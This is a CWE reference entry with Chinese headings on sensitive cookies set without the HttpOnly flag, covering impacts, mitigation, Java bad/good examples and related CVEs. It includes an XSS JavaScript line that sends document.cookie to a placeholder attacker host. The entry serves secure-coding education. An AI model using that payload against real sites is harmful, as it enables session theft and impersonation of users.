CWE-1004 没有'HttpOnly'标志的敏感Cookie

结构: Simple

Abstraction: Variant

状态: Incomplete

被利用可能性: Medium

基本描述

The software uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.

扩展描述

The HttpOnly flag directs compatible browsers to prevent client-side script from accessing cookies. Including the HttpOnly flag in the Set-Cookie HTTP response header helps mitigate the risk associated with Cross-Site Scripting (XSS) where an attacker's script code might attempt to read the contents of a cookie and exfiltrate information obtained. When set, browsers that support the flag will not reveal the contents of the cookie to a third party via client-side script executed via XSS.

相关缺陷

常见的影响

范围 影响 注释
Confidentiality Read Application Data If the HttpOnly flag is not set, then sensitive information stored in the cookie may be exposed to unintended parties.
Integrity Gain Privileges or Assume Identity If the cookie in question is an authentication cookie, then not setting the HttpOnly flag may allow an adversary to steal authentication data (e.g., a session ID) and assume the identity of the user.

可能的缓解方案

Implementation

策略:

Leverage the HttpOnly flag when setting a sensitive cookie in a response.

示例代码

In this example, a cookie is used to store a session ID for a client's interaction with a website. The intention is that the cookie will be sent to the website with each request made by the client.

The snippet of code below establishes a new cookie to hold the sessionID.

bad Java

String sessionID = generateSessionId();
Cookie c = new Cookie("session_id", sessionID);
response.addCookie(c);

The HttpOnly flag is not set for the cookie. An attacker who can perform XSS could insert malicious script such as:

attack JavaScript

document.write('<img src="http://attacker.example.com/collect-cookies?cookie=' + document.cookie . '">'

When the client loads and executes this script, it makes a request to the attacker-controlled web site. The attacker can then log the request and steal the cookie.

To mitigate the risk, use the setHttpOnly(true) method.

good Java

String sessionID = generateSessionId();
Cookie c = new Cookie("session_id", sessionID);
c.setHttpOnly(true);
response.addCookie(c);

分析过的案例

标识 说明 链接
CVE-2014-3852 CMS written in Python does not include the HTTPOnly flag in a Set-Cookie header, allowing remote attackers to obtain potentially sensitive information via script access to this cookie. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3852
CVE-2015-4138 Appliance for managing encrypted communications does not use HttpOnly flag. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4138

相关攻击模式

引用